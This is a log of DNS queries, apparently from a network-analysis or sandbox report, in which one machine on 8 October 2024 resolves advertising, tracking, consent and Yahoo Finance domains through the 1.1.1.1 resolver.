                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:26.564021111 CEST192.168.2.41.1.1.10xb58bStandard query (0)ads.pubmatic.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:26.611222029 CEST192.168.2.41.1.1.10xa2f7Standard query (0)ads.yieldmo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:26.611469030 CEST192.168.2.41.1.1.10xf7f2Standard query (0)ads.yieldmo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:26.637862921 CEST192.168.2.41.1.1.10x20eStandard query (0)eus.rubiconproject.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:26.638109922 CEST192.168.2.41.1.1.10x4dc4Standard query (0)eus.rubiconproject.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:26.724437952 CEST192.168.2.41.1.1.10x2b05Standard query (0)yahoo-bidout-d.openx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:26.724761009 CEST192.168.2.41.1.1.10x7d32Standard query (0)yahoo-bidout-d.openx.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:26.754242897 CEST192.168.2.41.1.1.10xcf2aStandard query (0)contextual.media.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:26.754407883 CEST192.168.2.41.1.1.10x5becStandard query (0)contextual.media.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:26.858387947 CEST192.168.2.41.1.1.10xd500Standard query (0)x.bidswitch.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:26.858536959 CEST192.168.2.41.1.1.10xeda5Standard query (0)x.bidswitch.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:26.860583067 CEST192.168.2.41.1.1.10x368Standard query (0)pixel.rubiconproject.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:26.860852003 CEST192.168.2.41.1.1.10xf8f0Standard query (0)pixel.rubiconproject.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:26.884962082 CEST192.168.2.41.1.1.10xfcd5Standard query (0)js-sec.indexww.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:26.885082006 CEST192.168.2.41.1.1.10xeeedStandard query (0)js-sec.indexww.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.048703909 CEST192.168.2.41.1.1.10x705cStandard query (0)consent.cmp.oath.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.048840046 CEST192.168.2.41.1.1.10xd4b8Standard query (0)consent.cmp.oath.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.059355974 CEST192.168.2.41.1.1.10xf4c2Standard query (0)eb2.3lift.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.059554100 CEST192.168.2.41.1.1.10x4042Standard query (0)eb2.3lift.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.282082081 CEST192.168.2.41.1.1.10xb1feStandard query (0)px.ads.linkedin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.282344103 CEST192.168.2.41.1.1.10x6512Standard query (0)px.ads.linkedin.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.282844067 CEST192.168.2.41.1.1.10x874dStandard query (0)pr-bh.ybp.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.282963037 CEST192.168.2.41.1.1.10x28e7Standard query (0)pr-bh.ybp.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.283364058 CEST192.168.2.41.1.1.10x3c0dStandard query (0)sync.srv.stackadapt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.283680916 CEST192.168.2.41.1.1.10x9369Standard query (0)sync.srv.stackadapt.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.317137957 CEST192.168.2.41.1.1.10x10d8Standard query (0)id.a-mx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.317265987 CEST192.168.2.41.1.1.10x8667Standard query (0)id.a-mx.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.317842960 CEST192.168.2.41.1.1.10x879aStandard query (0)rtb.openx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.318262100 CEST192.168.2.41.1.1.10x9ddbStandard query (0)rtb.openx.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.319518089 CEST192.168.2.41.1.1.10xc859Standard query (0)cm.adform.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.319716930 CEST192.168.2.41.1.1.10x4f7Standard query (0)cm.adform.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.320105076 CEST192.168.2.41.1.1.10xedcaStandard query (0)image8.pubmatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.320215940 CEST192.168.2.41.1.1.10xf503Standard query (0)image8.pubmatic.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.321157932 CEST192.168.2.41.1.1.10xb812Standard query (0)ssum.casalemedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.321546078 CEST192.168.2.41.1.1.10xe9afStandard query (0)ssum.casalemedia.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.321935892 CEST192.168.2.41.1.1.10x4873Standard query (0)ap.lijit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.322084904 CEST192.168.2.41.1.1.10x6bdfStandard query (0)ap.lijit.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.745157003 CEST192.168.2.41.1.1.10x5e58Standard query (0)ssp-sync.criteo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.745297909 CEST192.168.2.41.1.1.10x882bStandard query (0)ssp-sync.criteo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.765059948 CEST192.168.2.41.1.1.10x287aStandard query (0)ib.adnxs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.765261889 CEST192.168.2.41.1.1.10x61f4Standard query (0)ib.adnxs.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.790357113 CEST192.168.2.41.1.1.10x1d4bStandard query (0)pixel-eu.rubiconproject.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.790555000 CEST192.168.2.41.1.1.10x12deStandard query (0)pixel-eu.rubiconproject.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.835477114 CEST192.168.2.41.1.1.10x1a55Standard query (0)sync.ipredictive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.835869074 CEST192.168.2.41.1.1.10xf1e0Standard query (0)sync.ipredictive.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.837502003 CEST192.168.2.41.1.1.10x35aaStandard query (0)dis.criteo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.837624073 CEST192.168.2.41.1.1.10x6b3cStandard query (0)dis.criteo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.921087980 CEST192.168.2.41.1.1.10x2e50Standard query (0)hbx.media.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.921508074 CEST192.168.2.41.1.1.10x4a93Standard query (0)hbx.media.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.923892975 CEST192.168.2.41.1.1.10xfd67Standard query (0)gum.criteo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.924107075 CEST192.168.2.41.1.1.10x3b0cStandard query (0)gum.criteo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.952737093 CEST192.168.2.41.1.1.10x4c47Standard query (0)secure-assets.rubiconproject.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.952941895 CEST192.168.2.41.1.1.10x98ecStandard query (0)secure-assets.rubiconproject.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.963490963 CEST192.168.2.41.1.1.10x9a21Standard query (0)p.rfihub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.963624001 CEST192.168.2.41.1.1.10x7a40Standard query (0)p.rfihub.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.992089987 CEST192.168.2.41.1.1.10xbe2eStandard query (0)tsdtocl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.992292881 CEST192.168.2.41.1.1.10x3406Standard query (0)tsdtocl.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:28.087268114 CEST192.168.2.41.1.1.10x40b5Standard query (0)sync-tm.everesttech.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:28.087445974 CEST192.168.2.41.1.1.10x8d12Standard query (0)sync-tm.everesttech.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:28.161222935 CEST192.168.2.41.1.1.10x96c7Standard query (0)guce.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:28.161549091 CEST192.168.2.41.1.1.10x31a1Standard query (0)guce.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:28.227670908 CEST192.168.2.41.1.1.10x1572Standard query (0)query1.finance.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:28.228064060 CEST192.168.2.41.1.1.10x14b8Standard query (0)query1.finance.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:28.229527950 CEST192.168.2.41.1.1.10x6fe1Standard query (0)x.bidswitch.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:28.229731083 CEST192.168.2.41.1.1.10xbef2Standard query (0)x.bidswitch.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:28.234947920 CEST192.168.2.41.1.1.10x8b45Standard query (0)px.ads.linkedin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:28.235152006 CEST192.168.2.41.1.1.10x1d99Standard query (0)px.ads.linkedin.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:28.388808012 CEST192.168.2.41.1.1.10xcde7Standard query (0)sync-tm.everesttech.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:28.389158964 CEST192.168.2.41.1.1.10x1848Standard query (0)sync-tm.everesttech.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:28.463799000 CEST192.168.2.41.1.1.10x248cStandard query (0)guce.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:28.464087009 CEST192.168.2.41.1.1.10xa85cStandard query (0)guce.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.101713896 CEST192.168.2.41.1.1.10xdb00Standard query (0)widget.us.criteo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.101783991 CEST192.168.2.41.1.1.10xf897Standard query (0)widget.us.criteo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.115112066 CEST192.168.2.41.1.1.10x6d88Standard query (0)sync.a-mo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.115112066 CEST192.168.2.41.1.1.10x8e7cStandard query (0)sync.a-mo.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.126991987 CEST192.168.2.41.1.1.10xcf0eStandard query (0)s.amazon-adsystem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.127326965 CEST192.168.2.41.1.1.10x3acdStandard query (0)s.amazon-adsystem.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.177969933 CEST192.168.2.41.1.1.10x8f08Standard query (0)token.rubiconproject.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.178396940 CEST192.168.2.41.1.1.10x4299Standard query (0)token.rubiconproject.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.178520918 CEST192.168.2.41.1.1.10xdebbStandard query (0)ib.adnxs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.178591013 CEST192.168.2.41.1.1.10xc4f1Standard query (0)ib.adnxs.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.199590921 CEST192.168.2.41.1.1.10x556aStandard query (0)sync.1rx.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.199590921 CEST192.168.2.41.1.1.10xe8e6Standard query (0)sync.1rx.io65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.200120926 CEST192.168.2.41.1.1.10x3331Standard query (0)pixel.tapad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.200263977 CEST192.168.2.41.1.1.10x5e90Standard query (0)pixel.tapad.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.204159021 CEST192.168.2.41.1.1.10x33f3Standard query (0)match.prod.bidr.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.204365015 CEST192.168.2.41.1.1.10xe8ccStandard query (0)match.prod.bidr.io65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.205657959 CEST192.168.2.41.1.1.10x962aStandard query (0)pixel-sync.sitescout.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.205837011 CEST192.168.2.41.1.1.10x7521Standard query (0)pixel-sync.sitescout.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.206908941 CEST192.168.2.41.1.1.10xb05aStandard query (0)triplelift-match.dotomi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.207182884 CEST192.168.2.41.1.1.10x5b08Standard query (0)triplelift-match.dotomi.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.208506107 CEST192.168.2.41.1.1.10x6d63Standard query (0)um.simpli.fiA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.208506107 CEST192.168.2.41.1.1.10x1100Standard query (0)um.simpli.fi65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.209281921 CEST192.168.2.41.1.1.10x12d6Standard query (0)b1sync.zemanta.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.209503889 CEST192.168.2.41.1.1.10x5a45Standard query (0)b1sync.zemanta.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.220171928 CEST192.168.2.41.1.1.10xffacStandard query (0)sync.go.sonobi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.220422029 CEST192.168.2.41.1.1.10x61efStandard query (0)sync.go.sonobi.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.221107006 CEST192.168.2.41.1.1.10x2abbStandard query (0)medianet-match.dotomi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.221230030 CEST192.168.2.41.1.1.10x8e10Standard query (0)medianet-match.dotomi.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.222662926 CEST192.168.2.41.1.1.10x4fc1Standard query (0)us-u.openx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.223112106 CEST192.168.2.41.1.1.10x3678Standard query (0)us-u.openx.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.225105047 CEST192.168.2.41.1.1.10xb24fStandard query (0)pm.w55c.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.226793051 CEST192.168.2.41.1.1.10x9fa5Standard query (0)pm.w55c.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.385905981 CEST192.168.2.41.1.1.10x5d53Standard query (0)sync.srv.stackadapt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.385905981 CEST192.168.2.41.1.1.10xeea9Standard query (0)sync.srv.stackadapt.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.388638020 CEST192.168.2.41.1.1.10x6659Standard query (0)pr-bh.ybp.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.388887882 CEST192.168.2.41.1.1.10x54e6Standard query (0)pr-bh.ybp.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.389384031 CEST192.168.2.41.1.1.10x878bStandard query (0)cm.adform.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.389384031 CEST192.168.2.41.1.1.10x195Standard query (0)cm.adform.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.389883041 CEST192.168.2.41.1.1.10xc22bStandard query (0)cm.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.389883041 CEST192.168.2.41.1.1.10x1ab4Standard query (0)cm.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.390431881 CEST192.168.2.41.1.1.10x95b4Standard query (0)gum.criteo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.390431881 CEST192.168.2.41.1.1.10xa60bStandard query (0)gum.criteo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.390883923 CEST192.168.2.41.1.1.10x9c3aStandard query (0)cdn.jsdelivr.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.391021013 CEST192.168.2.41.1.1.10x153eStandard query (0)cdn.jsdelivr.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.391535997 CEST192.168.2.41.1.1.10xb4b4Standard query (0)eus.rubiconproject.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.392165899 CEST192.168.2.41.1.1.10xf101Standard query (0)eus.rubiconproject.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.736814976 CEST192.168.2.41.1.1.10x338eStandard query (0)hbx.media.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.737081051 CEST192.168.2.41.1.1.10xcf53Standard query (0)hbx.media.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:30.171353102 CEST192.168.2.41.1.1.10xc512Standard query (0)ad.turn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:30.171627045 CEST192.168.2.41.1.1.10xf94aStandard query (0)ad.turn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:30.342936039 CEST192.168.2.41.1.1.10x1b02Standard query (0)cs.media.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:30.343055964 CEST192.168.2.41.1.1.10x11d3Standard query (0)cs.media.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:30.352988958 CEST192.168.2.41.1.1.10x4a72Standard query (0)streamer.finance.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:30.353131056 CEST192.168.2.41.1.1.10x1215Standard query (0)streamer.finance.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:30.426008940 CEST192.168.2.41.1.1.10x8338Standard query (0)u.openx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:30.426126003 CEST192.168.2.41.1.1.10xd219Standard query (0)u.openx.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:30.545681953 CEST192.168.2.41.1.1.10x6404Standard query (0)sync.a-mo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:30.545840025 CEST192.168.2.41.1.1.10xf797Standard query (0)sync.a-mo.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:30.696764946 CEST192.168.2.41.1.1.10x8f23Standard query (0)widget.us.criteo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:30.696764946 CEST192.168.2.41.1.1.10x770cStandard query (0)widget.us.criteo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:30.740247965 CEST192.168.2.41.1.1.10x983eStandard query (0)token.rubiconproject.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:30.740247965 CEST192.168.2.41.1.1.10xdb9cStandard query (0)token.rubiconproject.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:30.754381895 CEST192.168.2.41.1.1.10x1fceStandard query (0)sync.crwdcntrl.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:30.754683018 CEST192.168.2.41.1.1.10x1ca8Standard query (0)sync.crwdcntrl.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:31.342252016 CEST192.168.2.41.1.1.10x6d2Standard query (0)rtb.mfadsrvr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:31.342252016 CEST192.168.2.41.1.1.10xf91dStandard query (0)rtb.mfadsrvr.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:31.856060028 CEST192.168.2.41.1.1.10xb68eStandard query (0)sync-tm.everesttech.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:31.856543064 CEST192.168.2.41.1.1.10xb1c7Standard query (0)sync-tm.everesttech.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:32.283919096 CEST192.168.2.41.1.1.10xefcStandard query (0)image2.pubmatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:32.284014940 CEST192.168.2.41.1.1.10x2cbStandard query (0)image2.pubmatic.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:32.287869930 CEST192.168.2.41.1.1.10xbe18Standard query (0)id.rtb.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:32.288001060 CEST192.168.2.41.1.1.10xea96Standard query (0)id.rtb.mx65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:32.299319983 CEST192.168.2.41.1.1.10x895fStandard query (0)prebid.adnxs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:32.299442053 CEST192.168.2.41.1.1.10x6fedStandard query (0)prebid.adnxs.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:32.300827026 CEST192.168.2.41.1.1.10x777Standard query (0)ow.pubmatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:32.300935030 CEST192.168.2.41.1.1.10x3aedStandard query (0)ow.pubmatic.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:32.445530891 CEST192.168.2.41.1.1.10x35aStandard query (0)hbx.media.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:32.445746899 CEST192.168.2.41.1.1.10x681dStandard query (0)hbx.media.net65IN (0x0001)false
